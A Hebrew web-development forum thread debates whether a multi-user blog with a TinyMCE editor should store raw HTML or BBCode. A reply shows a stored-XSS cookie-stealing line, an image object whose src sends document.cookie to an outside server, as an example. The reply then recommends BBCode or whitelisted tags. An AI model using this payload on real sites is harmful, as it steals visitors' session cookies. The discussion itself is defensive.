שלום
אני מתכנן לבנות מערכת בלוגים חדשה ...
לכל משתמש יהיה פאנל ניהול ובו הוא יוכל להוסיף תוכן לבלוג שלו.

בפאנל הניהול יהיה עורך WYSIWYG של TinyMCE

השאלה שלי היא האם עלי לקודד התוכן לBBCODE ? לדעתי יותר נוח לא לקודד אבל יכולות להיות בזה סכנון, השאלה היא עד כמה זה "מסוכן" . הרי מקסימום יוכלו להכניס קוד JS . הרי כל אחד שולט על הבלוג שלו בלבד והוא יוכל להכניס JS לבלוג שלו בלבד. זה לא משהו שממש מזיק למערכת. אם הוא רוצה להזריק לעצמו JS לבלוג, שיזריק.

בכל שאר המקומות באתר לא יהיה ניתן לכתוב בכלל HTML (בתגובות לבלוגים לדוגמא)
השאלה היא האם להגדיר את העורך שיוצא BBCODE או האם לשמור HTML רגיל ?
כמובן שלמסד אני ישלח את הקוד אחרי שאני יפעיל htmlspechialchars אבל בכל זאת, הדבר היחידי שניתן יהיה להזריק זה JS לתוך הבלוג של עצמך

מה שלא ציינתי זה שBBCODE ממש מגביל את האפשרויות של העורך, ככה שבכל מקרה אני מעדיף להשתמש בHTML
תודה

קודם כל אין בכלל קשר ל PHP לדעתי..
דבר שני:
קיים קוד JS שגונב קוקיז של כל המשתמשים שיכנסו לעמוד בו הוא ממוקם, אני לא הייתי רוצה להיכנס לבלוג של מישהוא בידיעה שיכול להיות לו קוד JS שגונב את הקוקיז שלי, ככה שאני מציעה לך או לחסום JS בכלל או לכתוב שפת סקיפרטים משלך שהיא מוגבלת עד מאוד, או פשוט לחסום קודים מזיקים של JS.
עכשיו תבין BBCODE זה לא משהוא שנועד כביכול לחסום קוד JS זו היא "שפת" MARKUP (לא יודע איך לתרגם לעיברית) שנועדה לאפשר עיצוב של עמוד שתנאים מוגבלים. אתה חוסם את כל ה HTML וכותב כביכול שפת מיניHTML שמאוד מוגבלת באפשרויות שהיא בעצם BBCODE.
עכשיו תחשוב על הפאשרות שאתה שומר כ HTML רגיל, מה מונע ממני להרוס את העיצוב שלך על ידי סגירת התג </body>?
קיצר תשתמש ב BBCODE או שתאפשר שימוש תגי HTML מוגבלים כגון <b> <i> <u> (למרות שנראה לי שכולם כבר deprecated מבחינת הסטנדרטים, תן לי לברר את זה [עריכה ללא הם לא deprecated אתה יכול פשוט לאפשר את השימוש בהם וזהו אותה מסודר, וכל השאר לסנן]).

אני לא מאמין שדפדפן שמכבד את עצמו יתן לקוד JS את הקוקיז שלך.....
הרי אם אפשר לשתול קוד כזה בבלוג... אפשר לשטול קוד כזה בכל עמוד אינטרנט. את מבקרת בעשרות עד מאות עמודי אינטרנט ביום. מאיפה לך שלא השתילו לך את הקוד הזה שם ?

2. מי שרוצה להרוד לעצמו את הבלוג עי הוספת תגים לא קשורים שיעשה את זה . סך הכול זה הבלוג שלו. למה שהוא ירצה להרוס לעצמו את הבלוג ...? הוא לא יכול להרוס בלוגים של אחרים.

זה כמו שאין וירוסים בלינוקס.... למה שמתכנתים יפתחו וירוסים ללינוקס אם כל המתכנתים משתמשים בלינוקס. ?

אני בן וחשבתי שהסמל של האיש הכחול ליד השם שלי אמור להדגיש את זה כמו שצריך...

טוב אניוואי לא קשור לדפדפן שמכבד או לא מכבד יש פקודה document.cookie שמדפיסה את ערך הקוקי. אני יכול בעזרת JS ליצור אובייקט תמונה שה SRC שלו יהיה אתר חיצוני משהוא סגנון

קוד:

new Image().src = "http://www.abc.com/script.php?a"+encodedURI(document.cookie)

כאשר ABC זה השרת שלי ו SCRIPT זה סקריפט שלי שמקבל ערך של קוקי ומכניס אותו לבסיס נתונים או משהוא אחר סגנון.

בקשר לזה אפשר לשתול קוד כזה בכל עמוד, אפשר לישתול עוד מיליוני קודים שונים שומזיקים יותר בכל עמוד אבל לא עושים את זה, זה סוג אמונה, כמו שאני מאמין שפרש לדוגמא לא ינסה לגנוב את הקוקיז שלי כי יש לי אמונה לפרש אבל אתר בסגנון w*w.mega.warez.com/a-lot-of-free-programs אני אפילו לא טורח להיכנס כי לא רק שיכול להיות שם XSS שגונב קוקי אלה הרבה יותר דברים אחרים. (שמתי כוכבית כי אין לי מושג אם אתר כזה קיים ואם כן אז הכוכבית תנמע מפרש להפוך אותו להיפר קישור)

בקשר למי שרוצה להרוס שיהרוס. שמע לא יודע לדעתי אפשרות של XSS או SQL INJ או עוד כל מיני באגים אפילו אם הם לא מזיקים כמו מתן אפשרות להכניס את התג </table> לתוכן העמוד מראה על אי רצינות או אי ידע של המפתח אבל זו רק דעתי.

ובקשר ללינוס אין קשר בכלל בין מה שאמרת, בלינוקס אין וירוסים כי לינוקס לא נותן לך גישת ROOT מלכתחילה כמו חלונות ובלי גישת רות אתה לא יכול להזיק למערכת ממש, כמו כן זה קוד פתוח לכן כל פירצת אבטחה שנמצא תתוקן גג תוך שבוע.

בתגובה שלך אלי רשמת ככה:

ציטוט:

ככה שאני מציעה לך או לחסום JS

אל תאשים אותי שלא הסתכלתי על האיש שאומר שאתה בן....

טעות בהקלדה סורי אל ההתנפלות.

http://shiflett.org/blog/2007/mar/a...-preventing-xss

אני חושב שאם תבקש ממנהל הפורום להעביר את האשכול לפורום המתאים, הוא לא יתנגד...